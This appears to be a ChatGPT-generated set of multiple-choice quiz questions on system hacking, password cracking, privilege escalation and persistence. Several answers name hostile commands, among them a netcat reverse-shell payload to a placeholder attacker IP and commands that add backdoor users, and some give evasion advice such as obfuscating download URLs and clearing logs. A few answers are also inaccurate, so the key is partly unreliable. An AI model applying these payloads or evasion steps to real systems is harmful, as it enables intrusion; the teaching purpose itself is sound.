UNIT -4

System Hacking (10 Questions)

1. Which of the following methods is most likely to detect weak passwords in a Windows domain?
A. Password spraying
B. Phishing
C. Dictionary attack
D. Keylogging

Answer: A
Explanation: Password spraying tests common passwords across multiple accounts to avoid account
lockouts.

2. While scanning a target system, you notice the RDP service is enabled. Which of the following
vulnerabilities could allow unauthorized access?
A. EternalBlue
B. BlueKeep
C. ShellShock
D. Log4Shell

Answer: B
Explanation: BlueKeep exploits RDP service vulnerabilities in older Windows systems.

3. Which command will show the currently logged-in users on a Linux system?
A. whoami
B. who
C. id
D. passwd

Answer: B
Explanation: The who command displays information about logged-in users.

4. After gaining low-privilege access to a Windows machine, which tool can dump NTLM hashes for
further exploitation?
A. BloodHound
B. Mimikatz
C. Netcat
D. Hydra

Answer: B
Explanation: Mimikatz is widely used to dump NTLM hashes and perform privilege escalation.

5. A Linux server uses a custom SSH port. Which tool can you use to identify the open SSH port?
A. Wireshark
B. Nmap
C. Metasploit
D. Burp Suite

Answer: B
Explanation: Nmap is commonly used to scan for open ports.
6. What is the most likely cause of a command injection vulnerability?
A. Improper user input validation
B. Weak passwords
C. Misconfigured services
D. Outdated cryptographic protocols

Answer: A
Explanation: Command injection occurs when user inputs are directly passed to system commands
without proper sanitization.

7. Which of these services is most often exploited to gain unauthorized access to a Linux system?
A. HTTP
B. FTP
C. SSH
D. DNS

Answer: C
Explanation: Weakly configured SSH services are commonly targeted.

8. Which type of malware is most often used for remote control of a compromised system?
A. Ransomware
B. RAT
C. Worm
D. Trojan

Answer: B
Explanation: Remote Access Trojans (RATs) provide attackers control over compromised systems.

9. Which of the following payloads would be used in a buffer overflow exploit?

A. Meterpreter reverse shell
B. Malicious JavaScript
C. SQL injection string
D. Phishing email

Answer: A
Explanation: Reverse shells are often used as payloads in buffer overflow exploits.

10. Which command can identify running processes on a Linux system?

A. top
B. netstat
C. ls
D. whoami

Answer: A
Explanation: The top command displays running processes and their details.

Password Cracking (10 Questions)

11. Which tool is used for offline password cracking?

A. Hydra
B. John the Ripper
C. Burp Suite
D. Nmap

Answer: B
Explanation: John the Ripper is optimized for offline password cracking.

12. What is the advantage of rainbow table attacks over brute force attacks?
A. They are faster for cracking precomputed hashes.
B. They do not require access to the target system.
C. They are resistant to salt in passwords.
D. They bypass firewalls.

Answer: A
Explanation: Rainbow tables store precomputed hashes for faster cracking.

13. Which hashing algorithm is considered insecure for password storage?

A. bcrypt
B. SHA-256
C. MD5
D. Argon2

Answer: C
Explanation: MD5 is outdated and vulnerable to attacks.

14. During a penetration test, which tool would you use to crack RDP passwords through brute
force?
A. Hydra
B. Hashcat
C. Netcat
D. BloodHound

Answer: A
Explanation: Hydra is commonly used for brute-forcing protocols like RDP.

15. Which feature of bcrypt makes it ideal for secure password hashing?
A. Salting
B. Iterative hashing
C. Fast computation
D. Both A and B

Answer: D
Explanation: Salting and iterative hashing in bcrypt increase security.

16. Which attack involves using leaked credentials from one system to access another?
A. Brute force
B. Rainbow table attack
C. Credential stuffing
D. Dictionary attack

Answer: C
Explanation: Credential stuffing reuses stolen credentials on other systems.
17. What is the best defense against password cracking attacks?
A. Using long, complex passwords
B. Storing passwords in plaintext
C. Using reversible encryption
D. Avoiding password rotation

Answer: A
Explanation: Long, complex passwords make cracking significantly harder.

18. Which tool is most suitable for cracking wireless network passwords?
A. Wireshark
B. Aircrack-ng
C. Nmap
D. Metasploit

Answer: B
Explanation: Aircrack-ng is designed for cracking Wi-Fi passwords.

19. Which type of password hash does the hashcat tool support?
A. MD5
B. bcrypt
C. SHA-1
D. All of the above

Answer: D
Explanation: Hashcat supports various hash types, including MD5, bcrypt, and SHA-1.

20. When cracking passwords, what is the purpose of salting?

A. To slow down brute force attacks
B. To ensure unique hashes for identical passwords
C. To protect passwords from SQL injection
D. Both A and B

Answer: D
Explanation: Salting ensures unique hashes and slows down brute-force attacks.

Post-Exploitation (10 Questions)

21. Which registry key is commonly modified to establish persistence on a Windows machine?
A. HKCU\Software\Microsoft\Windows\CurrentVersion\Run
B. HKCU\System\Registry
C. HKCU\System\Drivers
D. HKLM\Services\Startup

Answer: A

Explanation: The "Run" registry key executes programs during startup.

(30 more questions will follow in a subsequent response due to space limitations.) Let me know if
you'd like the remaining 30 MCQs immediately!

4o
You said:

yes

ChatGPT said:

ChatGPT

Here are the remaining 30 scenario-based MCQs on System Hacking and Post Exploitation.

Post-Exploitation (Continued)

21. Which registry key is commonly modified to establish persistence on a Windows machine?
A. HKCU\Software\Microsoft\Windows\CurrentVersion\Run
B. HKCU\System\Registry
C. HKCU\System\Drivers
D. HKLM\Services\Startup

Answer: A
Explanation: The "Run" registry key is commonly used for persistence.

22. Which technique is often used to maintain access to a compromised Linux system?
A. Creating a cron job with malicious commands
B. Modifying the BIOS firmware
C. Disabling user accounts
D. Encrypting the hard drive

Answer: A
Explanation: Cron jobs can schedule recurring malicious tasks to maintain access.

23. Which of these is a technique to escalate privileges on a Linux system?

A. Exploiting weak sudo configurations
B. Executing DLL injection
C. Modifying the SAM file
D. Performing a rainbow table attack

Answer: A
Explanation: Misconfigured sudo permissions are a common privilege escalation vector on Linux.

24. After obtaining a reverse shell on a Windows machine, how can you enumerate local user
accounts?
A. net user
B. dir /users
C. tasklist /users
D. whoami /all

Answer: A
Explanation: The net user command lists all local user accounts.

25. Which of the following would best ensure persistence on a Windows system?
A. Adding an entry to the Task Scheduler
B. Changing the default browser
C. Disabling user authentication
D. Replacing system fonts

Answer: A
Explanation: Task Scheduler can execute scripts or applications at specific times or during system
events.

26. Which tool can be used to map Active Directory attack paths and enumerate user privileges?
A. BloodHound
B. Nmap
C. Metasploit
D. Cain & Abel

Answer: A
Explanation: BloodHound helps enumerate attack paths in Active Directory environments.

27. What is the primary purpose of DLL injection during post-exploitation?

A. To execute code in the context of another process
B. To overwrite system files
C. To disable antivirus software
D. To escalate privileges

Answer: A
Explanation: DLL injection allows malicious code to execute in the address space of a legitimate
process.

28. What does the schtasks command do on a Windows system?

A. Lists scheduled tasks
B. Modifies user permissions
C. Downloads malicious payloads
D. Modifies system settings

Answer: A
Explanation: The schtasks command lists and manages scheduled tasks.

29. In reverse engineering, what is the primary purpose of using tools like IDA Pro?
A. To decompile malware and analyze its behavior
B. To encrypt malicious payloads
C. To capture network traffic
D. To monitor log files

Answer: A
Explanation: Tools like IDA Pro decompile and analyze executable files.

30. After gaining root access to a Linux server, which command would list all running services?
A. systemctl list-units --type=service
B. ps -aux
C. ls /services
D. whoami

Answer: A
Explanation: systemctl provides a comprehensive list of running services.
Privilege Escalation (10 Questions)

31. Which Windows feature is commonly exploited for privilege escalation?

A. Unquoted service paths
B. Sticky keys
C. SUID binaries
D. Cron jobs

Answer: A
Explanation: Unquoted service paths can allow privilege escalation when exploited.

32. What is a common privilege escalation vector on Linux systems?

A. Writable SUID binaries
B. Exploiting RDP
C. Unquoted service paths
D. Phishing emails

Answer: A
Explanation: Writable SUID binaries allow non-privileged users to execute code with elevated
privileges.

33. Which command would you use to check effective permissions on a Linux binary?
A. ls -l
B. chmod 777
C. cat /etc/passwd
D. whoami

Answer: A
Explanation: ls -l displays file permissions.

34. During a penetration test, you find a service running as SYSTEM but writable by any user. What
should you do to escalate privileges?
A. Replace the service executable with a malicious binary
B. Kill the service
C. Encrypt the service file
D. Run a brute force attack

Answer: A
Explanation: Replacing a writable service binary with a malicious one leads to privilege escalation.

35. Which tool can automate privilege escalation attempts on Linux?

A. LinPEAS
B. Wireshark
C. Hydra
D. Aircrack-ng

Answer: A
Explanation: LinPEAS automates privilege escalation enumeration on Linux systems.

36. What command would you use to identify potential privilege escalation opportunities in a
Linux sudoers file?
A. sudo -l
B. ls /etc/sudoers
C. cat /etc/shadow
D. id

Answer: A
Explanation: sudo -l lists the commands a user can run with sudo privileges.

37. What Windows tool would you use to check for weak permissions on services?
A. AccessChk
B. Wireshark
C. BloodHound
D. PowerView

Answer: A
Explanation: AccessChk identifies weak permissions on Windows resources.

38. Which command checks for writable directories in a Linux system?

A. find / -perm -o+w -type d 2>/dev/null
B. ls -l /etc/permissions
C. cat /etc/group
D. grep -i writable /var/log/syslog

Answer: A
Explanation: This find command searches for writable directories.

39. In Windows, which of these is a common sign of privilege escalation?

A. Creation of new user accounts with administrative privileges
B. Disabling antivirus software
C. Enabling BitLocker
D. Deleting system logs

Answer: A
Explanation: Adding users to the admin group is a common privilege escalation indicator.

40. Which vulnerability is often exploited for privilege escalation on older Linux kernels?
A. Dirty COW (CVE-2016-5195)
B. BlueKeep
C. EternalBlue
D. Log4Shell

Answer: A
Explanation: Dirty COW exploits a race condition in older Linux kernels to escalate privileges.

Maintaining Persistence (10 Questions)

41. Which file on Linux is commonly modified to gain persistence via scheduled tasks?
A. /etc/crontab
B. /etc/shadow
C. /etc/passwd
D. /var/log/auth.log
Answer: A

42. On a Windows machine, which command can be used to create a new user for persistence?
A. net user attacker /add
B. create user /admin
C. add-user -p persistence
D. whoami /create

Answer: A

43. Which of these persistence techniques is platform-agnostic?

A. Adding malicious SSH keys
B. Modifying the registry
C. Installing a malicious cron job
D. Both A and C

Answer: D

44. Which malware technique hides malicious files by embedding them in legitimate binaries?
A. Fileless malware
B. Code injection
C. Packing
D. Steganography

Answer: C

45. On Linux, where would an attacker likely add an SSH key for persistence?
A. ~/.ssh/authorized_keys
B. /etc/ssh/config
C. /var/keys/ssh_auth
D. /root/.config

Answer: A

46. What is the purpose of creating a new group with elevated privileges?
A. To escalate privileges and maintain access
B. To disable logging
C. To delete other groups
D. To bypass firewalls

Answer: A

47. Which Windows feature is exploited by attackers to create scheduled tasks for persistence?
A. Task Scheduler
B. Device Manager
C. Group Policy
D. Registry Editor

Answer: A

48. What persistence mechanism is commonly used in Active Directory environments?

A. Golden Ticket attacks
B. Scheduled tasks
C. Adding users to the administrators group
D. Both A and C

Answer: D

49. In Windows, which directory is often used to drop malicious DLLs for persistence?
A. C:\Windows\System32
B. C:\Users\Default\AppData
C. C:\ProgramData\Startup
D. C:\Temp

Answer: A

50. Which tool is often used to identify persistence mechanisms on a compromised machine?
A. Autoruns
B. Metasploit
C. Aircrack-ng
D. IDA Pro

Answer: A

Let me know if you'd like further details or explanations!

4o

You said:

now make mcqs scenario based

ChatGPT said:

ChatGPT

Here’s a set of scenario-based MCQs designed around real-world situations related to System
Hacking and Post Exploitation.

Scenario-Based MCQs

1. You have gained access to a low-privilege user account on a Linux server. While inspecting the
system, you notice that the /etc/passwd file is world-writable. What should you do next to
escalate privileges?
A. Replace the root user’s password hash in /etc/passwd with a known hash.
B. Modify the shadow file to add a backdoor user.
C. Change the permissions of the passwd binary.
D. Reboot the system to take control during boot.

Answer: A
Explanation: If /etc/passwd is writable, you can replace the root user’s hash to gain privileged
access.
2. During an engagement, you have captured NTLMv2 hashes from a Windows network. Which
tool would you use to attempt cracking these hashes offline?
A. Hydra
B. Hashcat
C. Wireshark
D. Metasploit

Answer: B
Explanation: Hashcat is a powerful tool for offline hash cracking, including NTLMv2.

3. You are performing a penetration test on a Windows environment. After uploading a payload,
you execute it, but the connection is blocked by the firewall. What technique should you try next?
A. Use a staged payload to bypass firewall detection.
B. Change the listening port to 80 or 443.
C. Use ICMP-based communication instead of TCP.
D. Encrypt the payload using symmetric encryption.

Answer: B
Explanation: Ports 80 and 443 are commonly allowed through firewalls since they are used for web
traffic.

4. After gaining a reverse shell on a Linux system, you want to enumerate running processes for a
potential privilege escalation vector. What command would provide the required information?
A. ps aux
B. ls -al /etc
C. sudo -l
D. whoami

Answer: A
Explanation: The ps aux command lists running processes, which can help identify misconfigured
services.

5. You’ve compromised a Windows system but need to establish persistence. You have access to
the Task Scheduler. Which of the following actions would achieve persistence?
A. Create a task that runs your payload on system startup.
B. Modify the registry to change the default shell.
C. Inject your payload into the winlogon process.
D. Disable UAC to prevent detection.

Answer: A
Explanation: A scheduled task can automatically execute your payload upon system startup.

6. During a vulnerability assessment, you find a service with unquoted paths in its configuration on
a Windows machine. How could you exploit this for privilege escalation?
A. Replace the service binary with a malicious executable.
B. Add a malicious executable to a path earlier in the unquoted sequence.
C. Restart the service to crash the system.
D. Modify the registry to point to a malicious DLL.

Answer: B
Explanation: Unquoted service paths can allow an attacker to inject a malicious executable if the
path isn’t explicitly defined.

7. You have access to a Linux server and notice the sudo command is misconfigured, allowing you
to run any command as root without a password. Which command would give you a root shell?
A. sudo -i
B. sudo chmod 777 /root
C. sudo reboot now
D. sudo echo "root"

Answer: A
Explanation: sudo -i spawns a root shell when the sudo configuration is misconfigured.

8. After exploiting a Windows machine, you find you are in a restricted environment with limited
commands available. Which tool would you use to escalate privileges or gain more access?
A. Mimikatz
B. PowerShell Empire
C. John the Ripper
D. Nessus

Answer: B
Explanation: PowerShell Empire can execute advanced scripts and escalate privileges.

9. While reviewing a compromised Linux system, you find an SUID binary owned by root and
writable by all users. How could you exploit this situation?
A. Overwrite the binary with a shell script to spawn a root shell.
B. Change the binary’s permissions using the chmod command.
C. Use the find command to locate hidden files.
D. Rename the binary to avoid detection.

Answer: A
Explanation: Overwriting a writable SUID binary can allow execution as root.

10. During an engagement, you discover a misconfigured web server running on port 8080. It is
vulnerable to command injection. Which payload would allow you to create a backdoor on the
server?
A. ; nc -e /bin/sh <attacker_IP> <port>
B. <script>alert('hacked')</script>
C. SELECT * FROM users WHERE id=1
D. dir C:\Windows\System32
Answer: A
Explanation: Using nc (Netcat) to create a reverse shell allows remote access to the server.

11. You successfully exploit a Windows machine using a reverse shell. To gather user information,
which command should you execute first?
A. whoami /priv
B. dir /users
C. net user
D. tasklist /users

Answer: C
Explanation: The net user command provides information about user accounts on the system.

12. A Windows administrator account is using an outdated version of Adobe Reader. What
technique could you use to escalate privileges?
A. Exploit a known CVE for Adobe Reader to execute malicious code.
B. Brute force the password of the admin account.
C. Upload a keylogger to the admin account directory.
D. Use a rainbow table attack on the admin hash.

Answer: A
Explanation: Exploiting known vulnerabilities in outdated software is a common privilege escalation
technique.

13. You’ve gained root access to a Linux machine but suspect other users may notice your changes.
What action can you take to clean your tracks?
A. Clear the ~/.bash_history file.
B. Disable system logging.
C. Modify the /var/log/auth.log file to remove evidence.
D. All of the above.

Answer: D
Explanation: Clearing logs and history helps attackers avoid detection.

14. You have discovered credentials stored in plaintext in a database. How should you use these
credentials to gain further access in the network?
A. Attempt credential stuffing on other network resources.
B. Run a rainbow table attack on the credentials.
C. Encrypt the credentials for later use.
D. Use a brute force tool like Hydra on the database.

Answer: A
Explanation: Credential stuffing uses stolen credentials to access other systems.
15. While analyzing exploit code, you find it downloads and executes a binary from a remote
server. How could you modify the code to avoid detection?
A. Use obfuscation to hide the URL of the malicious binary.
B. Encrypt the binary using a public key.
C. Change the file extension to .txt.
D. Add the binary to a whitelist in the antivirus configuration.

Answer: A
Explanation: Obfuscating the URL makes detection by network security systems harder.

Let me know if you’d like more questions or detailed explanations for any of these scenarios!

4o

You said:

35 more

ChatGPT said:

ChatGPT

Here are 35 more scenario-based MCQs for System Hacking and Post Exploitation.

Privilege Escalation Scenarios

16. You have access to a Linux system with a writable /etc/sudoers file. How could you exploit this
to escalate privileges?
A. Add your user to the sudo group without requiring a password.
B. Overwrite the file with a copy of /etc/passwd.
C. Modify the default shell in the sudoers file.
D. Change the permissions of the sudo command.

Answer: A
Explanation: Adding your user to the sudo group with the NOPASSWD directive allows you to
execute commands as root.

17. On a Windows server, you identify a service running with SYSTEM privileges and an unquoted
path: C:\Program Files\App Name\Service.exe. What should you do to exploit this?
A. Place a malicious executable named App.exe in C:\Program Files.
B. Replace Service.exe with a backdoor binary.
C. Restart the service to crash the system.
D. Disable the service to bypass security.

Answer: A
Explanation: An unquoted path allows attackers to place a malicious executable in the earlier part of
the path.
18. During a penetration test, you find a Windows machine where an insecure DLL is loaded by a
privileged service. How can you exploit this?
A. Replace the DLL with a malicious one.
B. Modify the registry key for the service to point to a different DLL.
C. Restart the machine to reset the service.
D. Remove the DLL to crash the service.

Answer: A
Explanation: Replacing an insecure DLL with a malicious one can lead to privilege escalation.

19. You find an SUID binary on a Linux system that executes /bin/cat with root privileges. What
would you do to escalate privileges?
A. Use the binary to read sensitive files like /etc/shadow.
B. Overwrite /bin/cat with a backdoor.
C. Add your user to the root group.
D. Use the binary to delete system logs.

Answer: A
Explanation: The SUID binary can be used to read files normally restricted to root.

20. On a Windows machine, you find that the Sticky Keys feature can be activated on the login
screen by pressing Shift five times. How could you exploit this for persistence?
A. Replace sethc.exe with a reverse shell payload.
B. Modify the explorer.exe process.
C. Enable hidden user accounts through the registry.
D. Add a new administrative user via a script.

Answer: A
Explanation: Replacing sethc.exe with a malicious binary provides access during login.

Post-Exploitation Scenarios

21. You’ve gained remote access to a Linux server and want to maintain persistence. Which action
would you take?
A. Add your SSH key to ~/.ssh/authorized_keys.
B. Modify the /etc/passwd file.
C. Disable SELinux.
D. Replace the sshd binary.

Answer: A
Explanation: Adding your SSH key ensures persistence without altering critical files.

22. After compromising a Windows machine, you find access to the registry editor. Which key
would you modify to create a backdoor?
A. HKLM\Software\Microsoft\Windows\CurrentVersion\Run
B. HKCU\System\Security\Backdoor
C. HKLM\System\ControlSet001\Services
D. HKCU\Software\Microsoft\Office

Answer: A
Explanation: Adding an entry to the Run key ensures the payload runs at startup.

23. You suspect antivirus software on a compromised Windows system is interfering with your
payload. Which tool could help bypass this?
A. Veil Framework
B. Wireshark
C. BloodHound
D. Nmap

Answer: A
Explanation: Veil Framework generates obfuscated payloads to bypass antivirus detection.

24. You have access to a compromised Linux system but lack root privileges. Which command
could help you find exploitable SUID binaries?
A. find / -perm -4000 2>/dev/null
B. ls /root
C. sudo -l
D. chmod 777 /bin

Answer: A
Explanation: This command identifies binaries with the SUID bit set.

25. On a compromised Windows system, you need to enumerate network shares. What command
would you use?
A. net view \\target
B. ipconfig /all
C. arp -a
D. dir \\target\share

Answer: A
Explanation: The net view command lists shared folders on a remote system.

Reverse Engineering and Exploit Analysis

26. You’ve been tasked with analyzing a malicious binary using IDA Pro. What is your primary
goal?
A. Decompile the binary to understand its functionality.
B. Obfuscate the binary for reuse.
C. Encrypt the binary to avoid detection.
D. Delete all traces of the binary.
Answer: A
Explanation: IDA Pro is used to analyze binaries and understand their behavior.

27. While analyzing exploit code, you find it uses a buffer overflow vulnerability. What is the most
likely outcome of running this exploit?
A. Execution of arbitrary code.
B. Data exfiltration to an attacker-controlled server.
C. Deletion of the target’s system files.
D. Disabling the target’s antivirus software.

Answer: A
Explanation: Buffer overflows typically allow attackers to execute arbitrary code.

28. A binary you’re analyzing uses anti-debugging techniques. What could you do to bypass these
protections?
A. Use a debugger with stealth capabilities like x64dbg.
B. Modify the system BIOS.
C. Encrypt the binary using AES.
D. Compile the binary in debug mode.

Answer: A
Explanation: Stealth debuggers can bypass anti-debugging mechanisms.

29. You discover a reverse engineering tool flagging multiple sections of a binary as "packer code."
What does this indicate?
A. The binary is packed to obfuscate its contents.
B. The binary is corrupt and cannot run.
C. The binary is likely safe to execute.
D. The binary has embedded shellcode.

Answer: A
Explanation: Packers compress or encrypt binaries to hide their true functionality.

Scripting and Automation

30. You’ve written a Python script to automate privilege escalation checks on a Linux server.
Which library would you use to execute system commands?
A. subprocess
B. pandas
C. scipy
D. numpy

Answer: A
Explanation: The subprocess module allows execution of system commands in Python.
31. You need to automate adding a user to a compromised Windows system via PowerShell.
Which command would you use?
A. New-LocalUser -Name "backdoor" -Password "P@ssw0rd"
B. Add-User backdoor /admin
C. create user -name backdoor -admin
D. net user /add backdoor P@ssw0rd

Answer: A
Explanation: PowerShell allows the creation of new local users with elevated privileges.

32. You’re tasked with automating reconnaissance on a Windows domain. Which PowerShell
script would you use?
A. PowerView
B. BloodHound
C. Metasploit
D. Hydra

Answer: A
Explanation: PowerView is a PowerShell tool for domain reconnaissance.

33. You’ve automated task scheduling on a compromised system to maintain persistence. What
tool did you likely use?
A. schtasks
B. taskkill
C. regedit
D. tasklist

Answer: A
Explanation: The schtasks command manages scheduled tasks on Windows.

34. Your script attempts privilege escalation by exploiting writable SUID binaries. What check
should you automate?
A. find / -perm -4000 -user root 2>/dev/null
B. ls /bin/root
C. chmod +x /root
D. cat /etc/shadow

Answer: A
Explanation: This find command checks for writable SUID binaries owned by root.

35. You’re writing a script to exfiltrate sensitive data from a compromised system. Which protocol
is most suitable for stealthy data transfer?
A. HTTPS
B. FTP
C. Telnet
D. SMB

Answer: A
Explanation: HTTPS encrypts traffic, making it harder to detect.